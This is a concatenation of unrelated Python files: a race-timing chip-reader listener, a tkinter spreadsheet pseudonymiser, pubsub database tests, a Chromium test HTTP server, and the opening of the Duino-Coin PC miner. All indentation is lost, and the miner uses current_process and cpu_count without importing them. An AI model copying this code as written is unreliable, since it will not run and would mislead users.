sendReaderEvent( tagTimes )
for tag, t in tagTimes:
q.put( ('data', tag, t) )
passingsCur += len(tagTimes)
if not tagReadSuccess:
break
time.sleep( delaySecs )
# Final cleanup.
cmd = 'STOPOPERATION'
try:
socketSend( s, '{}{}'.format(cmd, EOL) )
buffer = socketReadDelimited( s )
s.shutdown( socket.SHUT_RDWR )
s.close()
except Exception:
pass
def GetData():
data = []
while 1:
try:
data.append( q.get_nowait() )
except (Empty, AttributeError):
break
return data
def StopListener():
global q
global listener
global shutdownQ
# Terminate the server process if it is running.
# Add a number of shutdown commands as we may check a number of times.
if listener:
for i in range(32):
shutdownQ.put( 'shutdown' )
listener.join()
listener = None
# Purge the queues.
while q:
try:
q.get_nowait()
except Empty:
q = None
break
shutdownQ = None
def IsListening():
return listener is not None
def StartListener( startTime=datetime.datetime.now(), HOST=None, PORT=None ):
global q
global shutdownQ
global listener
StopListener()
if Model.race:
HOST = (HOST or Model.race.chipReaderIpAddr)
PORT = (PORT or Model.race.chipReaderPort)
q = Queue()
shutdownQ = Queue()
listener = Process( target = Server, args=(q, shutdownQ, HOST, PORT, startTime) )
listener.name = 'RaceResult Listener'
listener.daemon = True
listener.start()
@atexit.register
def CleanupListener():
global shutdownQ
global listener
if listener and listener.is_alive():
shutdownQ.put( 'shutdown' )
listener.join()
listener = None
if __name__ == '__main__':
def doTest():
try:
StartListener( HOST='127.0.0.1', PORT=DEFAULT_PORT )
count = 0
while 1:
time.sleep( 1 )
sys.stdout.write( '.' )
messages = GetData()
if messages:
sys.stdout.write( '\n' )
for m in messages:
if m[0] == 'data':
count += 1
print( '{}: {}, {}'.format(count, m[1], m[2].time()) )
elif m[0] == 'status':
print( 'status: {}'.format(m[1]) )
elif m[0] == 'passings':
print( 'passings: {}'.format(m[1]) )
elif m[0] == 'command':
print( 'command: {}'.format(m[1]) )
else:
print( 'other: {}, {}'.format(m[0], ', '.join('"{}"'.format(s) for s in m[1:])) )
sys.stdout.flush()
except KeyboardInterrupt:
return
t = threading.Thread( target=doTest )
t.daemon = True
t.start()
time.sleep( 1000000 )
|
PseudoDialogOptions.py
|
from tkinter import ttk
import tkinter as tk
import tkinter.filedialog as fd
import pandas as pd
import threading
import hashlib
import os
import pandas.io.formats.excel
import logging
from logging.handlers import RotatingFileHandler
import pem
from functools import partial
pandas.io.formats.excel.header_style = None
class App(tk.Tk):
def __init__(self):
super().__init__()
self.resizable(False, False)
self.geometry("500x300")
self.title("Simple Pseudonymiser")
self.welcomeLabel = tk.Label(self, text="Welcome to the Simple Pseudonymiser")
self.welcomeLabel.pack(padx=60, pady=10)
self.logger = logging.getLogger()
handler = RotatingFileHandler("pseudo_log.log", maxBytes=10*1024*1024, backupCount=5)
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.setLevel(logging.DEBUG)
style = ttk.Style()
style.configure("foreGreen.Label", foreground="green")
style.configure("foreRed.Label", foreground="red")
style.configure("foreOrange.Label", foreground="coral4")
style.configure("button.flat", relief="flat")
self._fileName = tk.StringVar()
self._result = tk.StringVar()
self._salt = tk.StringVar()
self._saltOutput = tk.StringVar()
self._pseudoOutput = tk.StringVar()
self._inputFileName = tk.StringVar()
self._resultOutput = tk.StringVar()
self._pseudoOutput.set("Pseudonymise the file")
self.btn_salt = ttk.Button(self, text="Choose a cert/pem file to generate your salt",
command=self.choose_pem_file, width=100)
self.btn_salt.pack(padx=60, pady=10)
self.btn_file = ttk.Button(self, text="Choose excel file and the select column to pseudo",
command=self.choose_file, state="disabled", width = 100)
self.btn_file.pack(padx=60, pady=10)
#self.menu_label_text = tk.StringVar()
#self.menu_label_text.set("Please choose a column to pseudo")
#self.menu_label = tk.Label(self, textvariable=self.menu_label_text)
#self.menu_label.pack(padx=60, pady=10)
self.options = ['']
self.om_variable = tk.StringVar(self)
self.om = ttk.OptionMenu(self, self.om_variable, *self.options)
self.om.configure(width=60)
self.om.pack(padx=60, pady=10)
self.om['state'] = 'disabled'
self.om_variable.trace("w", self.OptionMenu_SelectionEvent)
self.btn_pseudo = ttk.Button(self, textvariable=self._pseudoOutput,
command=self.pseudonymize_file, state="disabled", width=100)
self.btn_pseudo.pack(padx=60, pady=10)
self.resultLabel = ttk.Label(self, textvariable=self._resultOutput,
width = 400, wraplength=390, font=('Helvetica', 9, 'bold'))
self.resultLabel.configure(style="foreGreen.Label",anchor="center")
self.resultLabel.pack(padx=60, pady=10)
self.processing_bar = ttk.Progressbar(self, orient='horizontal', mode='determinate', length=300)
def report_callback_exception(self, exc, val, tb):
self.logger.error('Error: %s', val)
self.destroy_unmapped_children(self)
def destroy_unmapped_children(self, parent):
"""
Destroys unmapped windows (empty gray ones which got an error during initialization)
recursively from bottom (root window) to top (last opened window).
"""
children = parent.children.copy()
for index, child in children.items():
if not child.winfo_ismapped():
parent.children.pop(index).destroy()
else:
self.destroy_unmapped_children(child)
def choose_salt_file(self):
self.btn_file['state'] = 'disabled'
self._salt.set("")
file_types = (("Text File", "*.txt"),)
filepath = fd.askopenfilename(title="Open salt text file", filetypes=file_types)
exists = os.path.isfile(filepath)
if exists:
self._salt.set(filepath)
with open(self._salt.get()) as f:
self._salt.set(f.readline())
self._saltOutput.set("Your salt term is " + self._salt.get()[4:].rjust(len(self._salt.get()), "*"))
self.btn_file['state'] = 'normal'
self.logger.info('Salt Loaded')
def choose_pem_file(self):
self.btn_file['state'] = 'disabled'
self._salt.set("")
file_types = (("pem file", "*.pem"),("cert file", "*.cert"),("crt file", "*.crt"))
filepath = fd.askopenfilename(title="Open pem or cert file", filetypes=file_types)
exists = os.path.isfile(filepath)
if exists:
certs = pem.parse_file(filepath)
self._salt.set(filepath)
self._salt.set(certs[0].sha1_hexdigest)
self._saltOutput.set("Your salt term is " + self._salt.get()[4:].rjust(len(self._salt.get()), "*"))
self.btn_file['state'] = 'normal'
self.logger.info('Salt Loaded')
def choose_file(self):
self.btn_pseudo['state'] = 'disabled'
self._fileName.set("")
file_types = (("xlsx", "*.xlsx"),)
filepath = fd.askopenfilename(title="Open file", filetypes=file_types)
exists = os.path.isfile(filepath)
if exists:
self._fileName.set(filepath)
self._inputFileName.set(os.path.basename(self._fileName.get()))
self.btn_pseudo['state'] = 'normal'
self._resultOutput.set("")
self.logger.info('Data File Loaded '+self._fileName.get())
temp_name = self.get_file_display_name(self._fileName.get())
# self._pseudoOutput.set("Pseudonymise the column "+self.om_variable.get())
first_row = pd.read_excel(self._fileName.get(), dtype='str', encoding='utf-8', nrows=1)
self.options = list(first_row)
self.update_option_menu()
self.om['state'] = 'normal'
self.om_variable.set(self.options[0])
self._pseudoOutput.set("Pseudonymise the column " + self.om_variable.get())
def update_option_menu(self):
menu = self.om["menu"]
menu.delete(0, "end")
for string in self.options:
menu.add_command(label=string,
command=lambda value=string: self.om_variable.set(value))
def OptionMenu_SelectionEvent(self, *args):
self._pseudoOutput.set("Pseudonymise the column " + self.om_variable.get())
def pseudo(self, x):
sentence = str(x) + self._salt.get()
return str(hashlib.blake2s(sentence.encode('utf-8')).hexdigest())
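# Sketch (input value is hypothetical): self.pseudo('1234567890') returns the
# 64-character blake2s hex digest of '1234567890' concatenated with the loaded salt.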
def pseudonymize_file(self):
self.logger.info('Starting Pseudo: ' + self._fileName.get())
self.processing_bar.pack(padx=60, pady=10)
self.processing_bar.start(1000)
t = threading.Thread(target=self.pseudonymize_file_callback)
t.start()
def kill_progress(self):
self.processing_bar.stop()
self.processing_bar.pack_forget()
def get_extension(self, filename):
filename, file_extension = os.path.splitext(filename)
return file_extension if file_extension else None
def get_file_display_name(self, filename):
        temp_name = os.path.basename(filename)
return temp_name[:15] + ('..' + self.get_extension(temp_name) if len(temp_name) > 15 else '')
def pseudonymize_file_callback(self):
try:
self.btn_pseudo['state'] = 'disabled'
self.btn_file['state'] = 'disabled'
self.btn_salt['state'] = 'disabled'
temp_name = self.get_file_display_name(self._fileName.get())
self.resultLabel.config(style="foreOrange.Label")
self._resultOutput.set(temp_name + " is being loaded")
self.update()
df = pd.read_excel(self._fileName.get(), dtype='str', encoding='utf-8')
df.columns = df.columns.str.lower()
#if 'identifier' not in df.columns:
# self.resultLabel.config(style="foreRed.Label")
# self._resultOutput.set("No 'identifier' column exists in file!")
# self.btn_pseudo['state'] = 'normal'
# self.btn_file['state'] = 'normal'
# self.btn_salt['state'] = 'normal'
# self.kill_progress()
#else:
temp_name = str(self._fileName.get())
temp_name = temp_name.replace(".xlsx", "_psuedo.xlsx")
new_name = temp_name
self.btn_pseudo['state'] = 'disabled'
self.resultLabel.config(style="foreOrange.Label")
temp_name = self.get_file_display_name(self._fileName.get())
self._resultOutput.set(temp_name + " is being pseudonymised")
self.config(cursor="wait")
self.update()
#df['DIGEST'] = df.identifier.apply(self.pseudo)
#del df['identifier']
df['DIGEST'] = df[self.om_variable.get()].apply(self.pseudo)
del df[self.om_variable.get()]
self._result.set(os.path.basename(temp_name))
if os.path.exists(new_name):
os.remove(new_name)
df.to_excel(new_name, index=False)
self._resultOutput.set(os.path.basename(str(self._fileName.get())) + " has been pseudonymised")
self.resultLabel.config(style="foreGreen.Label")
self.btn_pseudo['state'] = 'disabled'
self.btn_file['state'] = 'normal'
self.btn_salt['state'] = 'normal'
self.config(cursor="")
self.logger.info('Completing Pseudo: ' + self._fileName.get())
self.kill_progress()
except BaseException as error:
self.resultLabel.config(style="foreRed.Label")
self._resultOutput.set('An exception occurred: details in log file')
self.btn_pseudo['state'] = 'normal'
self.btn_file['state'] = 'normal'
self.btn_salt['state'] = 'normal'
self.logger.error('An exception occurred: {}'.format(error))
self.kill_progress()
if __name__ == "__main__":
app = App()
app.mainloop()
|
test_pubsub.py
|
# coding=utf-8
"""Test of the Configuration Database events interface."""
import time
from threading import Thread
from sip_config_db._events.event_queue import EventQueue
from sip_config_db._events.pubsub import get_subscribers, publish, subscribe
from sip_config_db import ConfigDb
DB = ConfigDb()
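# Each test below flushes the database first so it starts from a clean event store.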
def test_events_subscribe():
"""Test subscribing to events."""
DB.flush_db()
object_type = 'test_object'
subscriber = 'test_subscriber'
subscribe(object_type, subscriber)
assert subscriber in get_subscribers(object_type)
def test_events_basic_usage():
"""Misc tests of the events interface."""
DB.flush_db()
event_type = 'test_event_type'
subscriber = 'test_subscriber'
object_type = 'test_object'
object_id = 'test_object_id'
# Subscribe to 'test' events with the 'test' subscriber
event_queue = subscribe(object_type, subscriber)
assert subscriber in get_subscribers(object_type)
# Publish an event.
publish(event_type, object_type=object_type, object_id=object_id)
# Keep asking for events until we get one.
while True:
event = event_queue.get()
if event:
assert event.id == '{}_event_00000000'.format(object_type)
assert event.type == event_type
assert not event.data
assert not event.origin
assert event.timestamp
assert event.object_id == object_id
assert event.object_type == object_type
assert not event.object_key
break
# There should be no published events as we already got the
# only event.
assert not event_queue.get_published_events()
# There should be one active event.
active_events = event_queue.get_processed_events()
assert len(active_events) == 1
assert active_events[0].id == '{}_event_00000000'.format(object_type)
# Global counter to verify the callback function was triggered the correct
# number of times.
CALLBACK_EVENT_COUNT = 0
def test_events_with_callback():
"""Test subscribing to events with a callback handler."""
def _callback_handler(message):
"""Event callback handler."""
global CALLBACK_EVENT_COUNT # pylint: disable=global-statement
CALLBACK_EVENT_COUNT += 1
assert 'callback_test_event_' in message['data']
# print('EVENT CALLBACK!! ', message['data'], CALLBACK_EVENT_COUNT)
def _watcher_function(queue: EventQueue, timeout: float):
"""Monitor for events."""
start_time = time.time()
while time.time() - start_time < timeout:
queue.get()
time.sleep(0.1)
DB.flush_db()
object_type = 'callback_test'
subscriber = 'test_subscriber'
event_type = 'test'
object_id = 'test-01'
# Subscribe to the 'pb' object events with the 'test' subscriber
event_queue = subscribe(object_type, subscriber,
_callback_handler)
assert subscriber in get_subscribers(object_type)
# Test using a custom watcher thread for the event loop.
thread = Thread(target=_watcher_function, args=(event_queue, 2.0,),
daemon=False)
thread.start()
for _ in range(10):
publish(event_type=event_type, object_type=object_type,
object_id=object_id)
thread.join()
assert CALLBACK_EVENT_COUNT == 10
# Test using the provided pubsub subscriber thread
thread = event_queue.pubsub().run_in_thread(sleep_time=0.01)
for _ in range(10):
publish(event_type=event_type, object_type=object_type,
object_id=object_id)
time.sleep(0.5)
thread.stop()
assert CALLBACK_EVENT_COUNT == 20
def test_events_recovery():
"""Test event recovery, eg. after a subscriber service crash."""
DB.flush_db()
event_type = 'test_event'
subscriber = 'test_subscriber'
object_type = 'test_object_type'
object_id = 'test_object_id'
# Start a subscriber that goes away. eg it crashes, or in this case is a
# temp thread that finishes after subscribing.
temp_subscriber = Thread(target=subscribe, args=[object_type, subscriber])
temp_subscriber.start()
temp_subscriber.join()
# While the subscriber is not getting events (it is a temp thread
# that has finished), some events are published.
publish(event_type, object_type=object_type, object_id=object_id,
event_data={'counter': 1})
publish(event_type, object_type=object_type, object_id=object_id,
event_data={'counter': 2})
# When the subscriber comes back, it will resubscribe but calling
# get on the event queue will not return any events as event notifications
# were missed.
event_queue = subscribe(object_type, subscriber)
event_count = 0
for _ in range(100):
event = event_queue.get()
if event:
event_count += 1
assert event_count == 0
# At this point, since we cleared the db for the test, there are no
# active (previously acknowledged) events
active_events = event_queue.get_processed_events()
assert not active_events
    # Get published events without processing them (i.e. process=False).
    # (Events returned with process=False will not be marked as processed.)
published_events = event_queue.get_published_events(process=False)
assert len(published_events) == 2
    # Get published events again, this time marking them as processed.
published_events = event_queue.get_published_events()
assert len(published_events) == 2
# Get published events yet again, this time there should be none as
# they have been 'processed'.
published_events = event_queue.get_published_events()
assert not published_events
# After asking for published events they are moved to the active queue.
active_events = event_queue.get_processed_events()
assert len(active_events) == 2
# If we complete the active events.
for event in active_events:
event_queue.complete_event(event.id)
# They are moved to the history queue and are no longer active.
active_events = event_queue.get_processed_events()
assert not active_events
|
webserver.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import BaseHTTPServer
import os
import ssl
import threading
class Responder(object):
"""Sends a HTTP response. Used with TestWebServer."""
def __init__(self, handler):
self._handler = handler
def SendResponse(self, headers, body):
"""Sends OK response with body."""
self.SendHeaders(headers, len(body))
self.SendBody(body)
def SendResponseFromFile(self, path):
"""Sends OK response with the given file as the body."""
with open(path, 'r') as f:
self.SendResponse({}, f.read())
def SendHeaders(self, headers={}, content_length=None):
"""Sends headers for OK response."""
self._handler.send_response(200)
for field, value in headers.iteritems():
self._handler.send_header(field, value)
if content_length:
self._handler.send_header('Content-Length', content_length)
self._handler.end_headers()
def SendError(self, code):
"""Sends response for the given HTTP error code."""
self._handler.send_error(code)
def SendBody(self, body):
"""Just sends the body, no headers."""
self._handler.wfile.write(body)
class Request(object):
"""An HTTP request."""
def __init__(self, handler):
self._handler = handler
def GetPath(self):
return self._handler.path
def GetHeader(self, name):
return self._handler.headers.getheader(name)
class _BaseServer(BaseHTTPServer.HTTPServer):
"""Internal server that throws if timed out waiting for a request."""
def __init__(self, on_request, server_cert_and_key_path=None):
"""Starts the server.
It is an HTTP server if parameter server_cert_and_key_path is not provided.
Otherwise, it is an HTTPS server.
Args:
server_cert_and_key_path: path to a PEM file containing the cert and key.
if it is None, start the server as an HTTP one.
"""
class _Handler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Internal handler that just asks the server to handle the request."""
def do_GET(self):
if self.path.endswith('favicon.ico'):
self.send_error(404)
return
on_request(Request(self), Responder(self))
def log_message(self, *args, **kwargs):
"""Overriddes base class method to disable logging."""
pass
BaseHTTPServer.HTTPServer.__init__(self, ('127.0.0.1', 0), _Handler)
if server_cert_and_key_path is not None:
self._is_https_enabled = True
      self.socket = ssl.wrap_socket(
          self.socket, certfile=server_cert_and_key_path,
          server_side=True)
else:
self._is_https_enabled = False
def handle_timeout(self):
"""Overridden from SocketServer."""
raise RuntimeError('Timed out waiting for http request')
def GetUrl(self):
"""Returns the base URL of the server."""
postfix = '://127.0.0.1:%s' % self.server_port
if self._is_https_enabled:
return 'https' + postfix
return 'http' + postfix
class WebServer(object):
"""An HTTP or HTTPS server that serves on its own thread.
Serves files from given directory but may use custom data for specific paths.
"""
def __init__(self, root_dir, server_cert_and_key_path=None):
"""Starts the server.
It is an HTTP server if parameter server_cert_and_key_path is not provided.
Otherwise, it is an HTTPS server.
Args:
root_dir: root path to serve files from. This parameter is required.
server_cert_and_key_path: path to a PEM file containing the cert and key.
if it is None, start the server as an HTTP one.
"""
self._root_dir = os.path.abspath(root_dir)
self._server = _BaseServer(self._OnRequest, server_cert_and_key_path)
self._thread = threading.Thread(target=self._server.serve_forever)
self._thread.daemon = True
self._thread.start()
self._path_data_map = {}
self._path_callback_map = {}
self._path_maps_lock = threading.Lock()
def _OnRequest(self, request, responder):
path = request.GetPath().split('?')[0]
# Serve from path -> callback and data maps.
self._path_maps_lock.acquire()
try:
if path in self._path_callback_map:
headers, body = self._path_callback_map[path](request)
if body:
responder.SendResponse(headers, body)
else:
responder.SendError(503)
return
if path in self._path_data_map:
responder.SendResponse({}, self._path_data_map[path])
return
finally:
self._path_maps_lock.release()
# Serve from file.
path = os.path.normpath(
os.path.join(self._root_dir, *path.split('/')))
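    # Reject requests that resolve outside the root directory (path traversal guard).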
if not path.startswith(self._root_dir):
responder.SendError(403)
return
if not os.path.exists(path):
responder.SendError(404)
return
responder.SendResponseFromFile(path)
def SetDataForPath(self, path, data):
self._path_maps_lock.acquire()
try:
self._path_data_map[path] = data
finally:
self._path_maps_lock.release()
def SetCallbackForPath(self, path, func):
self._path_maps_lock.acquire()
try:
self._path_callback_map[path] = func
finally:
self._path_maps_lock.release()
def GetUrl(self):
"""Returns the base URL of the server."""
return self._server.GetUrl()
def Shutdown(self):
"""Shuts down the server synchronously."""
self._server.shutdown()
self._thread.join()
class SyncWebServer(object):
"""WebServer for testing.
Incoming requests are blocked until explicitly handled.
This was designed for single thread use. All requests should be handled on
the same thread.
"""
def __init__(self):
self._server = _BaseServer(self._OnRequest)
# Recognized by SocketServer.
self._server.timeout = 10
self._on_request = None
def _OnRequest(self, request, responder):
self._on_request(responder)
self._on_request = None
def Respond(self, on_request):
"""Blocks until request comes in, then calls given handler function.
Args:
on_request: Function that handles the request. Invoked with single
parameter, an instance of Responder.
"""
if self._on_request:
raise RuntimeError('Must handle 1 request at a time.')
self._on_request = on_request
while self._on_request:
# Don't use handle_one_request, because it won't work with the timeout.
self._server.handle_request()
def RespondWithContent(self, content):
"""Blocks until request comes in, then handles it with the given content."""
def SendContent(responder):
responder.SendResponse({}, content)
self.Respond(SendContent)
def GetUrl(self):
return self._server.GetUrl()
|
PC_Miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.5.6)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from platform import machine as osprocessor
from os import path, system
from os import system as ossystem
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
from multiprocessing import Lock
from random import choice
import pip
import select
thread_lock = Lock()
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed - "
+ "Xxhash support will be disabled")
xxhash_enabled = False
# Global variables
MINER_VER = "2.56" # Version number
NODE_ADDRESS = "server.duinocoin.com"
AVAILABLE_PORTS = [
2813, # PC (1)
2814, # PC (2)
2815, # PC (3)
2812, # Wallets, other miners
2811 # Legacy
]
SOC_TIMEOUT = 45 # Socket timeout
PERIODIC_REPORT_TIME = 60
RESOURCES_DIR = "PCMiner_" + str(MINER_VER) + "_resources"
donatorrunning = False
debug = "n"
discord_presence = "y"
rig_identiier = "None"
requested_diff = "NET"
algorithm = "DUCO-S1"
config = ConfigParser()
donation_level = 0
thread = []
totalhashrate_mean = []
mining_start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
r = requests.get(url)
with open(RESOURCES_DIR + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(RESOURCES_DIR + "/Miner_config.cfg")
lang = config["Duino-Coin-PC-Miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
except:
    lang = "english"
def getString(string_name):
# Get string form language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debug_output(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
pretty_print(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
def calculate_uptime(start_time):
    uptime = time() - start_time
    if uptime >= 7200:
        return str(round(uptime // 3600)) + " hours"
    elif uptime >= 3600:
        return str(round(uptime // 3600)) + " hour"
    elif uptime >= 120:
        return str(round(uptime // 60)) + " minutes"
    elif uptime >= 60:
        return str(round(uptime // 60)) + " minute"
    else:
        return str(round(uptime)) + " seconds"
def get_prefix(diff: int):
if diff >= 1000000000:
diff = str(round(diff / 1000000000)) + "G"
elif diff >= 1000000:
diff = str(round(diff / 1000000)) + "M"
elif diff >= 1000:
diff = str(round(diff / 1000)) + "k"
return str(diff)
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requested_diff == "LOW":
diffName = getString("low_diff_short")
elif requested_diff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(MINER_VER)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ lang.capitalize()
+ " translation: "
+ Fore.YELLOW
+ getString("translation_autor"))
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debug_output("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " ⚙ "
+ diffName)
if rig_identiier != "None":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identiier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
def loadConfig():
# Config loading section
global username
global efficiency
global donation_level
global debug
global threadcount
global requested_diff
global rig_identiier
global lang
global algorithm
global SOC_TIMEOUT
global discord_presence
global PERIODIC_REPORT_TIME
# Initial configuration
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ RESOURCES_DIR
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_username")
+ Fore.RESET
+ Style.BRIGHT)
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1 ("
+ getString("recommended")
+ ")")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_intensity")
+ Fore.RESET
+ Style.BRIGHT)
threadcount = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_threads")
+ str(cpu_count())
+ "): "
+ Fore.RESET
+ Style.BRIGHT)
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - "
+ getString("low_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - "
+ getString("medium_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "3"
+ Style.NORMAL
+ " - "
+ getString("net_diff"))
requested_diff = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_difficulty")
+ Fore.RESET
+ Style.BRIGHT)
rig_identiier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_identifier")
+ Fore.RESET
+ Style.BRIGHT)
if rig_identiier == "y" or rig_identiier == "Y":
rig_identiier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_name")
+ Fore.RESET
+ Style.BRIGHT)
else:
rig_identiier = "None"
donation_level = "0"
if osname == "nt" or osname == "posix":
donation_level = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_donation_level")
+ Fore.RESET
+ Style.BRIGHT)
        # Check whether efficiency is correct
efficiency = sub(r"\D", "", efficiency)
if efficiency == "":
efficiency = 95
elif float(efficiency) > int(100):
efficiency = 100
elif float(efficiency) < int(1):
efficiency = 1
        # Check whether threadcount is correct
threadcount = sub(r"\D", "", threadcount)
if threadcount == "":
threadcount = cpu_count()
elif int(threadcount) > int(8):
threadcount = 8
print(
Style.RESET_ALL
+ Style.BRIGHT
+ getString("max_threads_notice"))
elif int(threadcount) < int(1):
threadcount = 1
